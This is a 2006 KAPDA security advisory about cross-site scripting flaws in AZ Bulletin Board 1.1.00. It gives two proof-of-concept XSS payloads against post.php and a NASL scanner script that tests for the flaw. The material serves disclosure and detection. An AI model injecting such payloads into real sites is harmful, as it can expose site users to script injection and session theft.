[KAPDA::#22] - Azbb v1.1.00 Cross Site Scripting
KAPDA New advisory
Vulnerable products : Azbb <= 1.1.00
Vendor: www.azbb.org
Risk: Low
Vulnerabilities: Cross Site Scripting
Found : Jan 20 2006
Vendor Contacted : Jan 21 2006
Release Date : Jan 21 2006
AZbb is "a forum that was written with a primary focus on security.
AZbb does not require a database such as MySQL, PostgreSQL or MSSQL and can even be used as a blog, or a portal".
Cross_Site_Scripting (XSS,CSS):
AZ Bulletin Board is affected by a cross-site scripting vulnerability.
This issue is due to the failure of the application to properly sanitize user-supplied input.
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed.
1)
This flaw exists because the application does not validate the "name" variable upon submission to the post.php script via the POST method.
h**p://www.[target]/post.php name="><script>alert('XSS')</script><!–
2)[limited XSS]
h**p://www.[target]/post.php?topic=>"<br><iframe%20src=javascript:alert()><br>"
azbb_1100_XSS.nasl
if(description)
{
script_version ("$Revision: 1.0 $");
name["english"] = "Azbb XSS";
script_name(english:name["english"]);
desc["english"] = "
The 'AZ Bulletin Board' PHP is installed. This version is affected by a
cross-site scripting vulnerability. This issue is due to a failure
of the application to properly sanitize user-supplied input.
As a result of this vulnerability, it is possible for a remote attacker
to create a malicious link containing script code that will be executed
in the browser of an unsuspecting user when followed.
Original Advisory: http://kapda.ir/advisory-236.html
Solution : Vendor contacted
Risk factor : Low";
script_description(english:desc["english"]);
summary["english"] = "Checks post.php XSS";
script_summary(english:summary["english"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2006 Pedram Hayati");
family["english"] = "CGI abuses : XSS";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("cross_site_scripting.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if (!get_port_state(port))exit(0);
if ( get_kb_item("www/" + port + "/generic_XSS") ) exit(0);
foreach dir (cgi_dirs())
{
req = string(dir, "/post.php?topic=>\"<br><iframe%20src=javascript:alert()><br>\" [XSS]");
req = http_get(item:req, port:port);
r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
if( r == NULL )exit(0);
if (egrep(pattern:"javascript:alert()", string:r))
{
security_warning(port);
exit(0);
}
}
exit(0);
N/A
http://kapda.ir/advisory-236.html
Discoverd by Roozbeh Afrasiabi
roozbeh_afrasiabi {a] yahoo.com
black_death {a] kapda.ir
www.persiax.com [currently down]
NASL Script by pi3ch {a] kapda.ir
KAPDA - Institute for Computer Security Researchers
http://www.KAPDA.ir